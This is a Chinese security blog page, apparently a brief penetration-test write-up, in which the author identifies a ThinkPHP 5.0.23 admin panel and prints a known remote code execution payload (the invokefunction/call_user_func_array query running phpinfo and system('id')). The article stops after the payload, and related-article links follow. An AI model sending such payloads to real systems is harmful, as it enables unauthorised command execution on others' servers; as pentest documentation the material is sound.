文章详情
一次艰难的TP渗透测试
围观人数:2368 日期:2020/11/6 6:00:35
信息收集
由于网站 www.a.com/admin,访问立即跳转到www.a.com/admin/publicer/login
发现是TP,5.0.23,在漏洞的版本范围内,尝试使用:
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
上一文章:WebLogic-XMLDecoder反序列化漏洞分析
下一文章:XSS实战攻击思路总结
相关推荐
- 11-04XSS实战攻击思路总结
- 11-23Thinkphp6.0任意文件写入漏洞复现
- 11-04GitHub企业版RCE漏洞(GitHubEnterprise
- 11-13一次旁站信息泄露的dedecms站点渗透
- 06-30最牛装逼神器iPhone6发表说说【非自慰】
- 04-26卡乐斗达人永久图标
- 11-12UEditor编辑器任意文件上传漏洞分析
- 11-03记一次不存在的ecshop实战渗透
- 11-17高级的MSSQL注入技巧
- 11-11漏洞分析-Apple授权过程的任意账号登录漏洞
- 11-11GEEKPWN2020-云安全挑战赛决赛-baby_kernel
- 10-22一次简单的内网渗透靶场实验
- 10-28强网杯2020-GooExecchromepwn分析及两种利用
- 11-16从apache-commons-collections中学习java反